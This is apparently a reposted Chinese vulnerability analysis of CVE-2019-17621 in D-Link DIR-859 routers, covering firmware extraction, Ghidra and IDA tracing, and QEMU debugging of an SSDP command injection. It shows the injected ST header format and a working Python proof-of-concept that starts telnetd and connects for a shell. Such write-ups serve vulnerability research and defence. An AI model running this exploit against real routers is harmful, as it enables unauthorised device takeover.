记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

CVE-2019–17621: D-Link DIR-859 未授权命令执行漏洞分析

2020-04-23 15:08

 

0x01.漏洞概述

1.简介

D-Link DIR-859设备LAN层中出现未经身份验证的命令执行漏洞(CVE-2019-17621)

2.漏洞研究版本

型号:DIR-859
固件版本:1.06b01 Beta01,1.05
架构:MIPS 32位

3.受影响的D-Link版本

 

0x02.漏洞起因

远程命令执行漏洞发生在cgibin可执行文件中的ssdpcgi_main()函数中,即使这个函数之前已经打过补丁,但是而由于环境变量未正确过滤而造成远程命令执行.

 

0x03.Firmadyne模拟DIR-859

1.使用Firmadyne成功模拟DIR-859

 

0x04.固件提取

1.获取固件

2.提取固件

3.grep搜索造成漏洞的cgibin文件

 

0x05.Ghidra二进制分析cgibin

1.查找造成漏洞的函数ssdpcgi_main()

2.分析ssdcgi_main()函数

首先通过getenv()获取环境变量,经过多个判断后经过urn,device,serivce等进行拼接成新的字符串,最后将新生成的字符串作为lxmldbc_system()的变量进行传递.

我们利用这个漏洞需要满足如下条件:

(1).HTTP_ST中含有urn:这四个字符以满足上面的判断条件

(2).将要执行的命令通过strstr()拼接到device或service上,以满足命令执行条件

(3).将拼接成的字符串传递给lxmldbc_system()

3.造成漏洞真正的原因是lxmldbc_system()函数,函数如下

lxmldbc_system()函数的参考地址:https://pastebin.com/kqEByBgA

根据原文,sistema de retorno为system()函数

4.根据lxmldbc_system()写了一个简单的Demo

5.运行Demo,执行系统命令

6.IDA跟进分析ssdpcgi_main

当我们控制HTTP_ST环境变量的值时,我们将命令在作为vsnpritf()函数的参数发送之前将它们连接起来,以格式化字符串.而格式化后的字符串保存在$0,$0会被lxmldbc_system()作为buffer,以执行system()命令。

 

0x06.使用Qemu+IDA动态调试

1.查看可执行程序格式

2.复制qemu-mips模拟运行cgibin

-0: 要请求的cgi
-E: 传入自定义的环境变量

通过Ghidra分析可以看出如果想要跳转到ssdpcgi_main()函数,想要匹配ssdpcgi才可以.

这些就是我们需要进行传输的数据

3.经过上面的操作已经启动qemu-mips-static对cgibin进行模拟,并监听在10000端口

4.IDA进行远程调试

(1).IDA加载cgibin时,选中Maunal load,发生弹窗全部选择确认

(2).在关键位置下断点

(3).IDA加载IP和PORT

(4).启动调试,运行到断点的位置,在最开始的判断的时候进行的强制更改跳转

(5).根据$0的地址到内存查找字符

这里我们也已经找到了传递过来并已经拼接的值

根据漏洞成因可以确定拼接成后的格式

s0:/etc/scripts/upnp/M-SEARCH.sh devices 127.0.0.1:13 1 urn:device:1;your command &
s0:/etc/scripts/upnp/M-SEARCH.sh services 127.0.0.1:13 1 urn:service:1;your command&

(6).根据lxmldbc_system()的第二个参数可以确定会去执行/etc/scripts/upnp/M-SEARCH.sh,这里我们进行验证拼接命令的字符串是否成功执行

 

0x07.编写POC

由于D-Link中本身就内置Telnet,所以直接使用Telent建立稳定的Shell

#!/usr/bin/python
import sys
import os
import socket
from time import sleep
# Exploit By Miguel Mendez - @s1kr10s
def config_payload(ip, port):
header = "M-SEARCH * HTTP/1.1n"
header += "HOST:"+str(ip)+":"+str(port)+"n"
header += "ST:urn:device:1;telnetdn"
header += "MX:2n"
header += 'MAN:"ssdp:discover"'+"nn"
return header
def send_conexion(ip, port, payload):
sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM,socket.IPPROTO_UDP)
sock.setsockopt(socket.IPPROTO_IP,socket.IP_MULTICAST_TTL,2)
sock.sendto(payload,(ip, port))
sock.close()
if __name__== "__main__":
ip = raw_input("Router IP: ")
port = 1900
print("n---= HEADER =---n")
headers = config_payload(ip, port)
print("[+] Preparando Header ...")
print("[+] Enviando payload ...")
print("[+] Activando servicio telnetd :)")
send_conexion(ip, port, headers)
print("[+] Conectando al servicio ...n")
sleep(5)
os.system('telnet ' + str(ip))

 

0x08.POC验证

成功连接telent,并执行系统命令

 

0x09.参考:

1.https://medium.com/@s1kr10s/d-link-dir-859-unauthenticated-rce-in-ssdpcgi-http-st-cve-2019-20215-en-2e799acb8a73
2.https://support.dlink.com/ProductInfo.aspx?m=DIR-859
3.https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147
知识来源: https://www.anquanke.com/post/id/203538

阅读:24704 | 评论:0 | 标签:漏洞 CVE

想收藏或者和大家分享这篇好文章→复制链接地址

“CVE-2019–17621: D-Link DIR-859 未授权命令执行漏洞分析”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云